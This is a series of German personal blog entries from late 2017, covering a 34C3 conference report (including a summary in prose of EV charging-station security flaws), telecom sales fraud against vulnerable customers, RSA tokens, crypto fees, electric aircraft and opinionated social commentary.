Die Keynote war von Charles Stross, einem bekannten und begnadeten Scifi-Autor (er bloggt auch unter antipope.org), von dem ich mir viel versprach. Er löste ein. Erster Schock: Er las seinen Vortrag ab. Das habe ich noch nie funktionieren sehen. Vor heute. Er hat das gemacht und es war gut. Ich kann kaum glauben, dass ich gesehen habe, wie das jemand bringt — und es funktioniert.
Inhaltlich war das natürlich kein Gute-Laune-Vortrag, das war ja abzusehen. Seine Gedankengänge basierten auf einer faszinierenden Überlegung: Dass man heutige AIs als Fortsatz von bestehenden analogen AIs sehen kann, nämlich Corporations. Ja, Firmen! Ich hab das heute morgen gehört und arbeite da seit dem dran, an der Idee. Löst lauter spannende Gedankengänge bei mir aus. Einer von seinen Punkten war, dass Regulierung als Lösung bisher gescheitert ist, weil sie zu langsam voran kommt, wa ser an der EU-Cookie-Richtlinie illustrierte. Ich würde sogar noch weiter gehen: Eine künstliche Intelligenz (und auch immer weiter durchautomatisierte und -virtualisierte Konzerne) können sich schneller anpassen als man sie regulieren kann.
Er hat versprochen, das in sein Blog hochzuladen. Ich empfehle auch ganz dringend den Stream. Das hat sich echt gelohnt, fand ich.
Mein nächster Vortrag war die Ladeinfrastruktur für Elektroautos, und das war ein Totalschaden von biblischen Ausmaßen, was der da beschrieben hat. Da wird die Karten-ID als Key genommen (die ist nur für Kollisionsvermeidung gedacht, da ist kein Krypto involviert), über eine unverschlüsselte Verbindung, auf dem Gerät kann man auch noch per USB-Stick die Konfiguration auslesen und ändern und Payloads aufbringen, die dann das Log mit den bisher verwendeten Karten-IDs ausspuckt, und dann auf deren Kosten Strom ziehen. Die Geräte sind unsicher, das Protokoll ist unsicher, und die Infrastruktur im Backend scheint auch eine Katastrophe zu sein, erzählte in der Q&A-Phase ein Zuschauer. Au weia. So viel kaputt auf so wenig Raum habe ich selten gesehen. Schon die Eröffnungssalve war ein Insider-Joke. Die verwenden Mifare Classic. Ich dachte an der Stelle, OK, den Rest von dem Votrag kann man sich auch schenken. Nein, kann man nicht. Das wurde noch viel übler.
Im nächsten Slot bin ich ein bisschen rumgelaufen und habe versucht, mich an das weiträumige Gelände zu gewöhnen. Ich irre hier immer noch ein bisschen rum und suche nach Dingen, mehr noch aus beim CCH, und das fand ich schon unübersichtlich, weil es wie so ein Quake-Level häufig mehr als einen Weg wohin gab. :-)
Danach habe ich mir "Science is Broken" in Saal 3 angeguckt, da ging es um die Replikationskrise und ob die wissenschaftliche Methode nicht insgesamt Bullshit ist, wenn die Leute alle p-Hacking betreiben. Ich fand den Vortrag prima, empfehle den Stream. Danach blieb ich in dem Saal, und da trugen dann drei Forscherinnen vor, bei denen darum ging, wie man die Probleme aufdecken und klären kann, die aus "die Anzahl der Zitate sind die Währung im Wissenschaftsbetrieb" folgen. Es klang am Anfang wie ein "lasst uns mal Big Data mit den Metadaten machen", aber dann kamen leider keine Ergebnisse sondern das war eher eine Aufforderung, das möge doch mal jemand machen, und man müsse mal diskutieren, was für Metriken man denn anlegen will und ab wann man von einem "Citation Cartel" redet (was für ein großartiger Begriff!). Ich hatte mehr gehofft, aber der Vortrag war auch bloß 30 Minuten lang, insofern schon OK.
Danach wollte ich mir eigentlich den Intel Management Engine kram angucken, aber bin in den falschen Saal gelaufen und habe mir dann dort die Lauschprogramme der Geheimdienste mit Ströbele angeguckt. Der konnte sich da leider keinerlei neue Details auspacken, was ja auch irgendwie klar war, insofern war das zwar ein flammendes Plädoyer, aber hat uns jetzt inhaltlich nicht viel weiter gebracht.
Danach kam Marc-Uwe Kling, und das war wie erwartet ein Fest. Der PC-Wahl-Hack war auch sehr unterhaltsam, und Steini über die Relativitätstheorie war auch ein Fest. Ein sehr gelungener erster Tag bisher.

Thu Dec 21 2017

[l] So, heute war nochmal ein Vodafone-Techniker da, und hat das Problem auf das Kabelmodem eingegrenzt und ein neues eingebaut. Jetzt scheint Internet wieder gut zu gehen. Ich beobachte das mal ein paar Tage, bevor ich Entwarnung gebe, aber sieht ganz gut aus.
Und ich möchte das zum Anlass nehmen, bei allem Gefrotzel über Kabel Deutschland und Vodafone mal den Berliner Kundenservice zu loben. Die haben wirklich gut performt. Vodafone hat mir so 2h-Zeitfenster genannt, und die Techies kamen a) überhaupt und b) innerhalb des Zeitfensters. Wie ich hörte, ist das alles andere als selbstverständlich in der Telco-Branche.
Und besonders der Mann heute hat auf ganzer Linie überzeugt. Der hat systematisch das Problem eingekreist und lieber nochmal eine Messung mehr gemacht als vorschnell Schlüsse zu ziehen. Eine sehr positive Erfahrung. Und ich will gar nicht wissen, wieviel Stress die so haben in ihrem Job. Liegt ja nahe, dass der Typ, der dann körperlich vor dir steht, den ganzen Frust und Ärger abkriegt. Ich bin ja immer freundlich zu Technikern und Sachbearbeitern, die irgendeinen Vorgang für mich bearbeiten, weil ich mir denke, der kann wahrscheinlich am wenigsten von allen dafür.
Also, an dieser Stelle nochmal ausdrücklich Hub ab und herzlichen Dank an das Technik-Team.

Wed Dec 20 2017

[l] Wo wir gerade bei Kryptowährungen waren… ein Einsender schickt mir diese passende Geschichte:
Lieferando akzeptiert seit einiger Zeit Bitcoins. Da ich über ein paar mBTC in meinem Wallet verfüge, wollte ich mir gerade eine Pizza bestellen. Heute ist bei meiner Lieblingspizzeria "Pizza-Dienstag". Mit ein paar anderen Sachen bin ich auf ca. 9,50 EUR gekommen.
Als ich dann über den Bezahldienstleister "bitpay" zahlen wollte, stand dort etwas von 18,50 EUR (umgerechnet aus Bitcoins und Kurs).
Tja, hat sich herausgestellt, dass man innerhalb von 15 Minuten zahlen muss und die Transaktionsgebühr für eine Transaktion in diesem Zeitraum halt 9 EUR kostet.
Ich habe dann eine Dose Ravioli aufgemacht.
In diesem Sinne: Guten Appetit! :-)

Tue Dec 19 2017

[l] Tolle Idee des Tages: Estland launcht ihre eigene Krypto-Währung "Estcoin" mit einem "trusted ICO".
Governments do need to consider the disruptive impact of how crypto tokens can be used as currency because they provide a more efficient means for exchanging value globally.
Aha. Soso. Voll gut informiert, der Mann.
Aber wird noch besser:
People who invest in crypto tokens issued by a startup are then strongly incentivised to support the development of that startup in other ways too and they tend to form an online community.
Aha. Soso. Der hat seine Hausaufgaben gemacht!1!!

Fri Dec 8 2017

[l] Oh wow. Flüchtlinge beschubsen scheint im Telco-Markt noch gar nicht die Schamgrenze zu sein. Guckt euch mal die Fälle hier an:
Nach Überzeugung des Gerichts hatten O2-Werber bei Telekom-Kunden angerufen und versucht, diese in die Irre zu führen. In einem Fall wurde ein Telekom-Kunde mit dem Argument bearbeitet, die Telekom werde seinen Anschluss künftig nicht mehr bedienen. In einem zweiten Fall wurde einer Telekom-Kundin eingeredet, es gebe ein neues Gesetz: Telefon- und Internetanschluss dürften nicht mehr bei zwei verschiedenen Anbietern bestellt werden.
Was für eine bodenlose Frechheit! Krass.
Ein anderer Einsender erzählt:
ich will das nicht verallgemeinern, weiß aber, dass z. B. [Telco] nicht ganz so gut deutschsprechende Menschen gerne abzieht. Ein Schüler von mir aus Bulgarien (ich unterrichte DAZ in Berlin) hatte Riesenprobleme mit [Telco], weil sie ihm einen Vertrag aufgeschwatzt haben, der ziemlich genau doppelt so teuer ist wie der normale. Die Gebühren konnte er natürlich irgendwann nicht mehr zahlen, weil Harz4 + natürlich noch ohne Job, da zuerstmal Deutschkurs. Dann hat er natürlich Mahnungen bekommen und sein Anschluss wurde bis zur Zahlung der Rückstände abgeschaltet. Also jeden Monat ca. 60-80 Euro für normalen Handyvertrag zahlen (jetzt auch nicht mit tollen Internetz oder so), noch Rückstände zahlen müssen und trotzdem nicht telefonieren können.
Den Vertrag konnten wir dann auch nur kündigen (also: in 2 Jahren wird's besser). Das Beste war noch, dass sie ihn mal in der Pause vom Deutschkurs angerufen haben und ihm irgendeinen Zusatzkram für nochmal 15 Euro im Monat verkaufen wollten. Ich stand daneben, er hat gesagt: Entschuldigung, ich verstehe Sie nicht. Hat sie natürlich überhaupt nicht abgehalten, es weiterzuversuchen. Auch als ich das Telefon genommen hab und es ihnen erklärt habe, dass er 1. kein Deutsch spricht, also jetzt schwerlich eine Art Vertragszusatz am Telefon abschließen kann und 2. überhaupt kein Interesse am Idiotenmedienpaket o. ä. hat, wollte die Verkäuferin ihn danach nochmal sprechen, um es doch nochmal zu versuchen.
Ich vermute sehr stark, dass das überhaupt kein Einzelfall, sondern unglaublich verbreitet ist und das es vermutlich einige zehn-hunderttausende Verträge in Deutschland gibt, die eigentlich ungültig sind, weil die Kunden nicht genügend Deutsch sprechen, um den Vertragsinhalt auch nur annähernd zu verstehen.
Ein anderer Einsender erzählt:
ich kümmere mich beruflich um ältere Menschen und nehme ihnen die Arbeit zu Hause ab, die sie selber nicht mehr machen können.
Einer meiner Kunden hat Morbus Parkinson in fortgeschrittenem Stadium.
Vor zwei Jahren, als die Krankheit noch nicht ganz so arg fortgeschritten war, ging er in den hiesigen [Telco]-Laden, weil er irgend ein kleines Problem mit seinem Telefon hatte.
Heraus kam er mit vier (!) neuen Handyverträgen.
Jeder konnte zu diesem Zeitpunkt schon die beginnende Demenz bei ihm klar erkennen. Auch ganz ohne medizinisches Grundwissen. Die Verwirrtheit von ihm war da schon ganz klar erkennbar.
Seine Frau hat über ein halbes Jahr gebraucht, um die ganze Geschichte dann mit Hilfe eines Rechtsanwalts stornieren zu lassen.
Ein anderer Einsender hat diese Geschichte:
Ich weiß aus eigener Erfahrung, wie eine befreundete afghanische Familie von [Telco] mit falschen Verträgen und falschen Vorwänden zu einer Bußgeldzahlung von über 600 Euro genötigt werden sollte. Letztendlich musste nichts bezahlt werden, weil wir den Verbraucherschutz eingeschaltet haben, deren Anwältin hat sich um alles gekümmert. Sie sagte, sie habe bis zu 5 neue Fälle pro Woche (!), letztendlich war es eine Frage von Durchhaltevermögen. Aber ohne die Hilfe von deutschen Muttersprachlern und der Anwältin des Verbraucherschutzes wäre die Familie denen schutzlos ausgeliefert, und es kommt wohl sehr häufig vor.
Bei dieser Familie lief es so:
Die Familie hatte schon einen Vodafone-Vertrag, darin waren eine Handynummer und Internet-Anschluss für zuhause enthalten. Einen Festnetzanschluss brauchte die Familie nicht.
Dann klingelte es einen schönen Tages an der Tür, jemand von [Telco], der sich allerdings als Techniker vorstellte, in der ganzen Straße würden neue Kabel gelegt, man wolle überprüfen ob die Leitungen in der Wohnung in Ordnung seien. Die gutgläubige Familie ließ den Mann herein. Im Wohnzimmer angekommen, sagte er prompt, eine Buchse fürs Internet sei defekt, das müsse repariert werden. Und fragte direkt, bei welchem Anbieter die Familie denn sei. Dann zog er aus seiner Tasche einen leeren Vertrag und schwatzte ihn der Familie auf. Er hat für die Familie alles selbst angekreuzt, was er drin haben wollte. Eine genaue monatliche Gebühr stand aber nicht darin. Dafür aber waren Dinge angekreuzt, die sich gegenseitig ausschließen, und Dinge, die die Familie nicht braucht und nicht will - zB. einen Festnetzanschluss.
Der Familienvater, der sich behelfsmäßig in gebrochenem Englisch mit dem [Telco]-Typen sprach, wollte sichergehen, dass er alles richtig versteht, und rief einen Freund an, der etwas Deutsch spricht. Der sprach dann mit dem [Telco]-Typen, es kam irgendwie zur Einigung.
Der Vertrag wurde unterschrieben und war damit gültig.
Was hatte [Telco] der Familie versprochen? Dass sie sich um nichts kümmern müssten. [Telco] würde ganz einfach selbst mit Vodafone die Ablösung aus dem bestehenden Vodafone-Vertrag regeln. Das geschah aber nicht, d.h. die Familie musste doppelt zahlen: Vodafone UND [Telco]. Außerdem hatte der [Telco]-Typ angekündigt, es werde ein Techniker von ihnen kommen, der alles korrekt anschließt und die angeblich defekte Buchse reparieren würde. Natürlich kam niemand, es wurde lediglich der Router zugestellt, der im Endeffekt unausgepackt blieb.
Da sowohl Vodafone als auch [Telco] Abbuchungen vom Konto machten, ließ der Familienvater die Beträge von [Telco] über die Bank zurückrufen. Sie hatten ja keinen Service geliefert und die Ablösung von Vodafone war nicht erfolgt. Also schickte [Telco] Mahnungen, immer dreistere.
Und jetzt der Klopper: Irgendwann haben meine Freundin und ich uns eingeschaltet, weil die Familie uns von der Sache erzählte. Das Problem ist, dass diese Menschen prinzipiell bescheiden sind und niemanden zur Last fallen wollen. Es ist ihnen natürlich auch peinlich, einen Fehler gemacht zu haben und keinen Ausweg zu wissen. Sie hatten sich schon damit abgefunden, über 600 Euro Gebühren und Strafe zahlen zu müssen.
Also riefen wir bei [Telco] an. Lange Gespräche mit freundlichen Mitarbeitern, die aber komplett verständnislos waren und hart blieben. "Nein, wir können da nichts machen."
Ich sagte: Aber die Familie hat defacto den Router nicht mal angeschlossen und über die Leitung ist kein einziger Bit gelaufen! Das können Sie doch nachgucken!
[Telco]: Spielt keine Rolle, Vertrag ist Vertrag.
Ich: Ist es denn rechtens, dass [Telco] einen deutschen Vertrag abschließt mit Menschen, die noch kein Deutsch sprechen, geschweige denn verstehen?
[Telco]: Das spielt keine Rolle, der Vertrag wurde unterschrieben. Aaaaaber, es gibt da eine Lösung. Wir können die Strafe runtersetzen auf etwa 300 Euro, der Rest wird erlassen. Dafür muss die Familie aber einen neuen Vertrag bei uns unterschreiben, der 2 Jahre Mindestlaufzeit hat (!!!).
Ich bin dann in die örtliche [Telco]-Filiale gegangen und habe geschildert, wie die Familie einen Vertrag unter falschen Bedingungen und Vorwänden unterschrieben hat. Da sagt der Verkäufer eiskalt, so in etwa: "Da können wir nichts machen, die haben ja unterschrieben. Außerdem haben wir mit diesen Haustürgeschäften NICHTS zu tun, das sind Dienstleister, die das für uns machen. Wenn die da "Fake-Verträge" an der Haustür abschließen, ist das die Verantwortung des Kunden. Und das ist egal, ob der Deutsch kann oder nicht."
Der hatte tatsächlich den Begriff "Fake-Vertrag" schon parat.
Dann sind wir zur Verbraucherzentrale gegangen, die ein Riesenlob verdient hat. Die kümmern sich kostenlos um Flüchtlinge und waren sehr hilfsbereit. Die Anwältin der Verbraucherzentrale hat mit [Telco] korrespondiert und hat durchgehalten, bis die aufgegeben haben. Es musste nichts gezahlt werden!
Es geht mir hier nicht darum, einzelne Telcos an den Pranger zu stellen, obwohl sich schnell der Eindruck einstellt, dass die das alle verdient hätten. Dass der Markt schlimm ist, wusste ich. Dass das SO schlimm ist, das haut mich jetzt doch ziemlich um.
Update: Ein besonders fieser Zyniker hat mir diesen Link geschickt, den ich hier mal unkommentiert so stehen lassen will.

Wed Dec 6 2017

[l] Die eilig durch den US-Senat gepeitschte Steuerreform hat wohl zwei drei klitzekleine handwerkliche Mängelchen. Sie haben da im Effekt Abschreibungsmöglichkeiten in Höhe von über 300 Milliarden Dollar weggemacht, die genau ihre Spender treffen werden.
Welche Spender fragt ihr?
Oh, da habe ich gute Nachrichten! Am lautesten heult Murray Energy. Kommt euch bekannt vor, der Name? Dann habt ihr bestimmt diese Last Week Tonight-Folge geguckt! :-)
Wieso haben die denn da nicht besser aufgepasst, wollt ihr wissen?
Nun, das liegt daran, dass sie abgelenkt waren. Damit, Änderungen zu formulieren, die möglichst ausschließlich Demokraten-regierten Bundesländern weh tun.

Tue Dec 5 2017

[l] Ich bin ja immer wieder erstaunt, dass IMMER NOCH Leute RSA-Tokens einsetzen.
Die Sicherheit von denen basiert auf einem Geschäftsgeheimnis. Sie sagen uns nicht, wie es funktioniert. Das alleine reicht in meiner Welt schon für einen technischen KO.
Aber gut.
Die Tokens sind im Wesentlichen Zufallszahlengeneratoren, die von einem Seed starten, von dem RSA uns verspricht, dass sie ihn nicht speichern, weil ja sonst RSA bei allen ihren Kunden einloggen könnte. Das gesamte Vertrauen in das Verfahren basiert darauf, dass die Kunden RSA glauben, dass sie die Seeds nicht gespeichert haben.
Und was passiert dann?
Dann kommt raus, dass RSA die Seeds nicht nur gespeichert hat, sondern dass Hacker sie geklaut haben.
Das ist ja wohl der Todesstoß. Ernsthaft mal. Wieviel Realitätsabstand muss man haben, um nach DER Nummer noch RSA-Tokens einzusetzen?
Aber ich irrte. Leute setzen das immer noch ein.
Und jetzt? Es gibt mal wieder ein kritisches Sicherheitsproblem in der Infrastruktur.
Kann mir das mal bitte jemand erklären? Wieviel muss RSA verkacken, damit das Produkt tot ist?
Ich bin ja vor vielen Jahren mal zur Cebit gegangen und staunte nicht schlecht, als ich da einen Stand der Crypto AG fand. Die hier. Die gab es noch. Nicht nur gab es die noch, die hatten einen Stand auf der Cebit. Ich war wie betäubt. Ich ging zu dem Stand und bat den Schlipsträger da, mir das zu erklären. Man würde ja denken, wenn es zu einer Krypto-Firma solche Geschichten gibt, dass die dann tot sind. Ich meine, Blackwater hat sich wenigstens umbenannt. Crypto AG hat sich nicht umbenannt. Die haben einfach weitergemacht unter ihrem alten Namen. Ich ging da also hin und fragte den Typen, wie es sein kann, das sie noch existieren und einen Cebit-Stand haben.
Und der Typ guckte mich an und sagte: Die Leute haben kein gutes Langzeitgedächtnis.

Sun Dec 3 2017

[l] Gute Nachrichten. Brexit ist so gut wie rückgängig gemacht. Tony Blair kümmert sich drum.

Sat Dec 2 2017

[l] Apple hat in einem späteren Patch den Patch für das Login-als-root-ohne-Passwort-Problem wieder rückgängig gemacht. m(
Einmal mit Profis arbeiten!

Wed Nov 29 2017

[l] Zu meiner Elektro-Flug-Frage kam noch ein umfangreicher Leserbrief rein:
Das Hauptproblem ist tatsächlich die Effizienz der normalen Triebwerke. Die müssen nun mal einen riesigen Leistungsbereich abdecken: Beim Start wird viel Schub benötigt, im Reiseflug nur noch wenig. Und aufgrund der Redundanzen musst Du ja auch noch einen Triebwerksausfall beim Start verkraften können und das eben auch auf einem 2000m über NN gelegenen Flugplatz bei 45°C Lufttemperatur.
Die Triebwerke laufen also im normalen Reiseflug mit einem Bruchteil der Leistung für die sie ausgelegt sind.
Dann hast Du das Thema Lärm: Die Triebwerke hängen meistens unter den Flügeln und strahlen damit Lärm nach unten ab. Wenn Du das Antriebssystem jetzt verteilst kannst Du die Gasturbine für die Stromerzeugung „oben“ anbringen und damit den Lärm für die Anwohner reduzieren. Geräusche entstehen natürlich auch durch die elektrischen Antriebe, aber eben weniger.
Der Hauptnachteil von Batterien ist, dass sie während des Fluges nicht leichter werden. Sie haben zwar auch eine geringere Energiedichte als Kerosin aber das Thema Gewicht wirkt fast schwerer. Darum konzentriert sich das auch alles im Moment auf Regionalflugzeuge.
Müsste ein Großraumflugzeug elektrisch 10.000km weit fliegen, müsste es das Gewicht der Batterien und damit auch die Energie, dieses Gewicht in der Luft zu halten die vollen 10.000km weit mitführen. Bei Kerosin wird das Flugzeug jede Sekunde ein wenig leichter, wodurch wieder der Gesamtenergieaufwand, das Ding in der Luft zu halten sinkt.
Bei kurzen Regionalstrecken macht sich das weniger bemerkbar und da kann man sogar noch einen Schritt weiter gehen: Du lädst die Batterie am Boden voll auf, musst diesen Strom also schon mal nicht während des Fluges erzeugen. Die Turbine zum Nachladen der Batterie kann jetzt kleiner ausfallen, da das Nachladen ja jetzt in aller Ruhe passieren kann.
Eine genauere Analyse gibt es von LNC in einer mehrteiligen Artikelreihe, falls es Dich interessiert. Darin stellt Bjoern sehr Anschaulich die verschiedenen Einflussfaktoren dar:
https://leehamnews.com/2017/06/30/bjorns-corner-electric-aircraft/
Und ein anderer Einsender führt aus Maschinenbausicht aus:
Als Maschinenbau-Student, dessen Schwerpunkt "Thermische Turbomaschinen" ist, möchte ich kurz erläutern, wieso es Vorteile mit sich bringt eine Nutzleistung Gasturbine (so nennt man das Konzept mittels Gasturbine einen Generator zur Stromerzeugung anzutreiben) zu verwenden:
1. Gasturbinen müssen massiv gekühlt werden, damit die Effizienz und Leistungsausbeute möglichst hoch bleiben. Das ist gerade beim Start ein besonders großes Problem, da hierbei die größte Leistung erfordert wird. Bei Antrieb eines Generators kann man die Turbine somit in einem einzigen Betriebspunkt (optimaler Wirkungsgrad) laufen lassen und die Kühlung entsprechend hierauf auslegen.
2. Elektromotoren liefern quasi ab 0U/min bereits ihr maximales Drehmoment, also auch die gesamte Leistung, bzw. ist sehr variabel bezüglich der Drehzahl. Das spart wiederrum Kühlleistung, da die Drehzahl u.U. gesenkt werden kann.
3. Die Energiedichte von Kerosin ist besser, das stimmt. Die Wandlung Kerosin->Strom ist nicht verlustfrei. Elektromotoren haben jedoch den Vorteil, dass zur variablen Drehzahleinstellung keine Getriebe benötigt werden, ohne das immense Wirkungsgradverluste in Kauf genommen werden müssen. Daher muss eine bilanzierte Betrachtung gemacht werden, ob die Rechnung überhaupt aufgeht (in diversen Hybridisierungs-Konzepten werden ja schon entsprechende Verbrennungsmotor-Generator-Elektromotor Konzepte verfolgt).
4. Ohne Wagnis keine Innovation. Auch wenn das Vorhaben keine Früchte tragen wird, ist die Erkenntnis darüber, warum es in diesem Fall nicht funktioniert hat, ein Fortschritt gerade weil es SO nicht funktioniert hat.
Wie immer vielen Dank an die Einsender!

Tue Nov 28 2017

[l] Ich schrieb, dass "die Leute" in Saudi Arabien und den Emiraten lieber ihr Geld für Diamant-Smartphones ausgeben als für Bildung. Das bezog sich auf Schilderungen, die sich auf "die Scheiche" bezogen, nicht auf die normalen Bürger. Denn das langfristige Ziel von BGE ist ja sowas wie Star Trek: Es gibt kein Geld mehr, jeder kann alles haben. Und über die normalen Bürger weiß ich nichts.
Umso erfreulicher, dass mir ein Einsender seine Beobachtungen geschildert hat. Hier sind sie:
Wie das bei den saudis läuft weiß ich nicht, aber in den emiraten sieht das ganz anders aus, als du das schreibst.
Klar die haben für ihre staatsbürger zwar ein bedingungsloses grundeinkommen von ca 2500.- (was dort nicht für "Diamanten-belegtes Mobiltelefon" reicht) , zahlen keinen strom und wenn sie heiraten bekommen sie haus und grundstück geschenkt ( zwar nicht da wo sie möchten, sondern wo die staatliche siedlungspolitik es für sinnvoll erachtet, weshalb sich fast alle auch was eigenes kaufen wie und wo sie es möchten, geht auch nicht von 2500.-, nicht mal zur miete).
Krankenkasse zahlt auch der staat und das nicht wie hier nach kostendämpfung, sondern nach dem was der arzt für notwendig erachtet, einzelzimmer und chefarzt sind dann wieder deren problem Steuern zahlen die nicht, dafür müssen sie am jahresende 1 oder 2 % ihres jahreseinkommens für wohltätige zwecke abgeben Altenheime gibts es nur für die, die keine kinder haben, ansonsten ist dafür immer die familie zuständig und das erachten sie auch als ihre pflicht.
Wenn du also eine frau willst, dann reicht das grundeinkommen nicht, weil die damen dort anspruchsvoll sind und deren väter erst recht, das wäre bei uns vergleichbar mit berufs-hartz-IV-ler, darüber wird der soziale status definiert, wer kein geld hat, der ist einfach zu dumm sich bildung anzueignen und steht deshalb sozial ganz unten, kurz vor geistig behindert, mit ungebildeten menschen umgibt man sich dort nicht, wenn nicht mit krankheit entschuldigt ergo keine bildung = schande für eltern/sozialer abstieg = einsamkeit
Was allerdings bildung angeht, da sind die viel weiter als bei uns, bildung ist dort extrem wichtig.
Der staat zahlt alles, incl. hefte, stifte etc, nachhilfe, wenn das not tut, 1x im jahr gibts ferien und ansonsten hast du vormittags und nachmittags schule, auch schon die grundschüler.
Da wird auf wissensvermittlung wert gelegt und nicht auf ewige zeitkostenende diskussionen über sozialverhalten und ethik, das nehmen dort noch die elternhäuser wahr, schon um nicht selber schlecht dazustehen.
Wenn du ein auslandssemester machen willst, dann auch das, sogar samt unterkunft, uni-gebühren, büchern ect, wenn du ein folgestudium machst z.b. facharzt, das ebenfalls der staat fördert bildung wo es nur geht, da spielt geld dann keine rolle, hauptsache man braucht keine spezialisten vom ausland, sondern zieht sich seine wissenselite selber groß und ist damit dann nicht mehr auf andere angewiesen.
Egal ob du abi machst oder studium beendest, die wissen auch das nicht jeder das geistige potential hat, du hast ne jobgarantie, allerdings weder im handwerk, noch im einzelhandel, noch im dienstleistungsbereich, das erledigen gastarbeiter.
emiratis findest du nur im staatsdienst (für nicht studierte oder nicht abiturienten, wobei das schon die familie zu verhindern weiß), als akademiker, im managment oder als inhaber eines geschäftes mit mind. 51% firmenanteil, das ist nämlich die bedingung, wenn du als ausländer dich dort selbständig machen willst, weshalb bildung auch ganz wichtig ist
Bei ca 2,2 mio einwohnern hat das emirat dubai ca 8,5 mio gastarbeiter, und da heulen die bei uns rum ^^ und du wirst lachen, dabei sind beide seiten glücklich und das nicht wegen des ministry of happiness die emiratis, weil sie keine "niederen arbeiten" machen und die gastarbeiter, weil sie mit dem geld was sie verdienen ihre familien in der heimat wie könige leben lassen können.
Ja richtig gelesen … in der heimat…. familiennachzug wird vom einkommen abhängig gemacht, dafür gibts ne tabelle, was du netto haben mußt um für deine frau aufkommen zu können und dann zusätzlich pro kind (da würden dann z.b. gesundheitsvorsorge, schule etc anfallen, weil es für gastarbeiter nicht kostenlos ist), das macht dort keiner der gastarbeiter, weil von demselben geld die familie in der heimat mehr hat, die kinder können bessere bildung bekommen, die mädchen in bessere kreise einheiraten etc
einmal im jahr zahlt der arbeitgeber einen heimflug für die 4 wochen urlaub und wenn du straffällig wirst bekommst du ein lebenslanges einreiseverbot und deine familie auch, sprich dein sohn hat keine chance ebenfalls als gastarbeiter dort ein weit höheres einkommen zu erzielen, als in der heimat.
ich hab mit nem taxifahrer geredet, der dort seit jahrzehnten arbeitet, der ist ganz stolz, daß sein sohn ein handwerk lernen konnte, seine frau ein haus samt pool hat und seine zwei töchter reichere männer heiraten konnten. Sein sohn fängt demnächst auch in dubai an zu arbeiten, besser verdienend als er dank schulbildung und handwerk, meinst du die versauen ihren kindern die zukunft?
klar ist das ne diktatur, verkleidet als monarchie, aber es stört keinen
was ich extrem aussagekräftig fand war folgende aussage eines gastarbeiters dort:
ich frage mich warum eure politiker mit ihrem massiven polizeiaufgebot wo immer sie unterwegs sind so eine angst um ihr leben haben. Bei uns fährt der scheich oft genug selber im eigenen auto ohne irgendeine eskorte, der hat keine angst vor attentätern, weil ihn alle lieben, auch wir gastarbeiter.
Was machen eure also falsch?
Update: Ich glaube nicht, dass irgendjemand von euch nicht darüber informiert ist, wie es in den Emiraten mit den Menschenrechten aussieht. Aber falls doch: Human Rights Watch, Amnesty International. Und Gastarbeiter haben es in den Emiraten auch nicht grundsätzlich rosig: Bericht von Thai-Gastarbeitern, die um ihren Lohn geprellt wurden. Der Guardian spricht von "modern day slavery". An die Geschichten mit der de-facto Sklavenhaltung in Katar für die WM-Bauprojekte erinnert sich hoffentlich auch noch jeder. Es ging hier nicht darum, irgendwas zu relativieren oder unter den Tisch fallen zu lassen, sondern wie immer im Blog ging es darum, andere Perspektiven zu hören.
[l] Heute morgen auf dem Weg zur Arbeit habe ich bei einem Supermarkt Halt gemacht, um mir eine Flasche Orangensaft zu kaufen.
Vor der Kasse putzte eine junge Frau, komplett in schwarz gekleidet, Leggings, T-Shirt, alles schwarz, und in dicken weißen Lettern auf dem Shirt vorne "FEMINISTIN".
Die musste da anscheinend gerade vor den Kassen den Boden feudeln. Ich kam die Treppe in Richtung Kasse runter und sah sie da putzen, und sie guckte dann die Treppe hoch, ob ich da jetzt langlaufen will, wo sie putzt.
Mit so einer Körperhaltung wie eine Leibeigene. Bloß keinen Blickkontakt mit dem Hausherrn.
Ich wäre am liebsten die Treppe rückwärts wieder hochgelaufen.
Übrigens ansonsten sehr innovativ, der Supermarkt. Die hatten da zwei Kassen nebeneinander mit einer Kassiererin, und die hat die Kassen immer abwechselnd benutzt. Während eine mit Kartezahlung blockiert war, hat die halt an der nächsten Kasse den nächsten Kunden abgefertigt.
Die Regalbefüllung hat übrigens ein Mann gemacht.
[l] Was sagt uns das eigentlich, dass die New York Times es geschafft hat, einen Nazi zu begleiten und einen Artikel über ihn zu schreiben?
Die Nazis sind für die freie Presse aufgeschlossener als die "Liberalen"?
Oder erinnert sich jemand daran, dass ein linker Safe Space jemanden reingelassen hätte, der nicht vorher drei Jahre lang bewiesen hat, dass er päpstlicher als der Papst ist? Nicht nur voll auf ihrer Seite steht sondern sogar noch extremer ihre Werte vertritt als sie selbst?
Ich nicht.
Aber die Nazis trauen sich. VICE hatte ja auch diesen Artikel vor einer Weile über diesen Rechtsextremisten anlässlich des einen Aufmarschs, wo dann einer mit dem Auto in die Menschenmenge gefahren ist. Der hätte sich ja auch weigern und die beschimpfen können. Rein strukturell war der nicht so viel anders aufgestellt als die kreischenden Linken. Der war überzeugt, dass er für das Gute kämpft, und dass er inhaltlich Recht hat und die Welt das schon früher oder später verstehen würde, weil es ja im Grunde offensichtlich ist. Und er war bereit, dafür persönliche Nachteile in Kauf zu nehmen, dass er seine Botschaft rauskriegt. Weil er so überzeugt war, dass er auf der richtigen Seite steht.
Gut, der wirkte jetzt nicht wie ein großer Intellektueller. Aber geistig behindert war der auch nicht.
Wieso der das wohl gemacht hat? Dachte der wirklich, er kann die Kreis-Linken überzeugen? Wusste der nicht, wer Vice ist? Immerhin: Ich denke heute noch über den nach. Das hat er geschafft mit der Aktion.

Mon Nov 27 2017

[l] Nachdem bisher alle meine Versuche scheiterten, einen meiner Twitter-Hater in ein persönliches Gespräch zu verwickeln, vielleicht auch im Rahmen von einer Alternativlos-Folge: Hier nochmal ein Angebot. Auf dem 34c3 werde ich ansprechbar sein. Kommt zu mir und redet mit mir.
Nur zwei Bedingungen.
1. Kommt ohne Posse.
  Ich bin mir fast sicher, dass ein Großteil der Leute, die mir auf Twitter und co die Beulenpest auf den Hals wünschen, eigentlich überhaupt gar kein Problem mit mir haben, denn sie kennen mich ja auch gar nicht. Die glauben bloß, bei ihrer Posse so punkten zu können.
  Um die Überprüfung dieser Hypothese geht es mir unter Anderem bei diesem Angebot.
2. Keine Aufnahmegeräte.
Wenn es irgend geht, dann bitte auch keine Manifeste oder Argumentlisten ausdrucken. Das habt ihr doch auch gar nicht nötig.
